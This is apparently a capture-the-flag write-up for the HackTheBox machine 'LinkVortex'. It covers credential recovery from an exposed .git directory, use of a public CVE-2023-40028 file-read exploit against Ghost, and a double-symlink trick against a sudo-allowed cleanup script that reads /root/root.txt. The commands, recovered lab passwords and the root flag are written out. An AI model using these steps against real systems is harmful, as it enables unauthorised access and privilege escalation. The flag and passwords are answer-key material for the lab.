User flag

We found a dev subdomain but it doesnt look helpful right away

 

Valid username found at http://linkvortex.htb/ghost/

If we enter an invalid login and click forgot password we get user not found

 

Valid login shows

 

 

Password spraying locks us out for an hour… so its safe to say this isnt the path.

 

 

Back to the dev subdomain we find a .git directory

 

We use gitdumper to dump the directory and find 2 passwords.

newPassword: 'thisissupersafe',

password = 'OctopiFociPilfer45';

 

 

This login works for the admin directory

[email protected]:OctopiFociPilfer45

 

With creds we can exploit this vulnerability 

https://github.com/0xyassine/CVE-2023-40028/blob/master/CVE-2023-40028.sh

 

 

We find a file in the docker file

 

 

Using the exploit we can get the files contents which has a username and password

        "user": "[email protected]",
       "pass": "fibber-talented-worth"
 

 

 

Root flag

 

User bob may run the following commands on linkvortex:
   (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
 

cat /opt/ghost/clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
 CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
 /usr/bin/echo "! First argument must be a png file !"
 exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
 LINK_NAME=$(/usr/bin/basename $LINK)
 LINK_TARGET=$(/usr/bin/readlink $LINK)
 if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
   /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
   /usr/bin/unlink $LINK
 else
   /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
   /usr/bin/mv $LINK $QUAR_DIR/
   if $CHECK_CONTENT;then
     /usr/bin/echo "Content:"
     /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
   fi
 fi
fi
 

 

 

We can use a double symbolic link to exploit this. The script above looks for /etc or /root in the link so we cant use a single link directly.

 

We create one link on link1.txt and a second link on two.png pointing to link1.txt bypassing the filter

 

ln -s /root/root.txt link1.txt
ln -s /home/bob/link1.txt two.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/two.png
Link found [ /home/bob/two.png ] , moving it to quarantine
Content:
35920a1163237ee264385afcdf4dafa0